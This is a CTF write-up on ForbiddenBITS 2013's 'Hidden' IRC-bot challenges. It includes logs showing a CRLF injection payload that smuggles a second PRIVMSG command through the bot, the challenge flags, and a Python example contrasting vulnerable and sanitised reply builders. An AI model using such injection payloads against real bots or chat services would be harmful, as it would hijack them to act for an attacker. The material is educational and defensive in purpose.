IT Security Enthusiast

[ForbiddenBITS CTF 2013] [Writeup] [Hidden1 & Hidden2]

In the CTF IRC channel (irc://freenode.net/forbiddenbits) we see this in the description:
//try to have fun with our bot :D

So we tried to execute some commands, and some of them worked: "!", "!help", "!flag", "!hidden", ...

[16:26] <AchN30_> !help
[16:26] <[FB]BOTx> 8,1 ima stupid bot :

Hidden Challenge 01:

[16:50] <AchN30_> !flag
[16:50] <[FB]BOTx> Here's Your Bloody Flag {bcba84b2e0774f4d30d630d7bce8afa1}

Flag: bcba84b2e0774f4d30d630d7bce8afa1

Hidden Challenge 02:

[16:28] <AchN30_> !hidden
[16:28] <[FB]BOTx> Make me say "CAN I HAZ FLAG" to Stephnix, dont forget to mention your nickname

Hmm, let's try CRLF injection.

[16:43] <AchN30_> test\n PRIVMSG AchN30_ :HEllO WORLD!
[16:43] <[FB]BOTx> test
[16:43] <[FB]BOTx> HEllO WORLD!
Now we can query Stephnix to get the flag.

Cool, now let's get the flag :)

[16:47] <AchN30_> \n PRIVMSG Stephnix :AchN30_: CAN I HAZ FLAG
After a couple of minutes, Stephnix queried AchN30_ with the flag.

Flag: c272047fb6327750109b0f9b95d2e6f4
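
The injection works because IRC is line-based: whatever follows a CR or LF in the bot's outgoing text is parsed by the server as a new command sent by the bot. The Python below is an added example, not the ForbiddenBITS bot's code (its source is not shown here). It builds the bot's reply with and without neutralising line breaks and shows how many commands reach the server. The function names, the channel name and the assumption that the bot expands a typed `\n` into a real newline are all hypothetical.

```python
import re

# Constructed sample: the exact text typed in the channel in the writeup
# (a literal backslash followed by "n", not a real newline).
SAMPLE = r"test\n PRIVMSG AchN30_ :HEllO WORLD!"
CHANNEL = "#forbiddenbits"  # assumed from the IRC URL on the page


def unescape(text):
    # Assumption: the bot expands typed escapes into real control characters.
    return text.replace("\\r", "\r").replace("\\n", "\n")


def build_reply_vulnerable(target, user_text):
    # User-controlled text is placed on the wire unchanged.
    return "PRIVMSG {} :{}\r\n".format(target, unescape(user_text))


def build_reply_hardened(target, user_text):
    # An IRC message ends at CR or LF, so neither may appear inside a
    # parameter; NUL is also not allowed. Neutralise them after unescaping.
    if not target or re.search(r"[\s,\x00]", target):
        raise ValueError("invalid target")
    body = re.sub(r"[\r\n\x00]", " ", unescape(user_text))
    return "PRIVMSG {} :{}\r\n".format(target, body)


def commands_on_wire(raw):
    # What the server parses: one command per CR/LF-terminated line.
    return [line.strip() for line in re.split(r"[\r\n]+", raw) if line.strip()]


if __name__ == "__main__":
    for build in (build_reply_vulnerable, build_reply_hardened):
        print(build.__name__, commands_on_wire(build(CHANNEL, SAMPLE)))
```

The sanitising step has to run after any unescaping or decoding; filtering the raw input first would miss the newline that the decode step creates.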
